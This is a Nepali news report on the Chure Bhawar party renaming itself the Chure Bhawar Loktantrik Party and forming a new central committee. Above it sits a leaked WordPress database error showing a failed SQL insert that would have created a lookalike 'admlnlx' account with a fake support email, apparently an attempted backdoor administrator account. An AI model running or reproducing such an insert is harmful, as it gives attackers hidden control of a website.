WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6T6MOSxgA3xiof9xPZWp5QfjlHIdC1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 09:18:50', '', 'admlnlx', 'admlnlx')
काठमान्डौं, माघ ६-
राष्ट्रिय चुरेभावर पार्टीले प्रेस विज्ञप्ती जारि गर्दै आजका मितिवाट चुरेभावर लोकतान्त्रिक पार्टीमा रुपान्तरित भएको घोषणा गरेको छ ।
राष्ट्रको नयाँ संविधान २०७२ अनुसार हुने विभिन्न तहका निर्वाचनमा आफ्ना उपस्थिति सशक्त ढंगबाट देखाउनु पर्ने चुनौती आई परेको भन्दै “चुरेभावर” शब्दावली संग सम्वन्ध र सरोकार राख्ने सबै नेता तथा कार्यकताहरुमा पार्टी एकिकरणको दिशामा एकमत भई अग्रसरता देखाउन भन्दै एकिकरणको लागी आह््वान गरेको छ ।
चुरेभावर पार्टी आजका मितिवाट चुरेभावर लोकतान्त्रिक पार्टीमा रुपान्तरित भएको जानकारि गराउदै,पार्टीको विधान, लोगो र चुनाव चिन्हको बारेमा आगामी ०७४ सालमा हुने पार्टीको आवधिक महाधिवेशनबाट निक्र्यौल गर्ने भएको छ । भूमिराज निरौलाको अध्यक्षतामा दुवै समुहका नेता कार्यकर्ताहरुको ५१ सदस्यीय नयाँ केन्द्रीय कार्य समिति गठन गरिएको जानकारि दिएको छ ।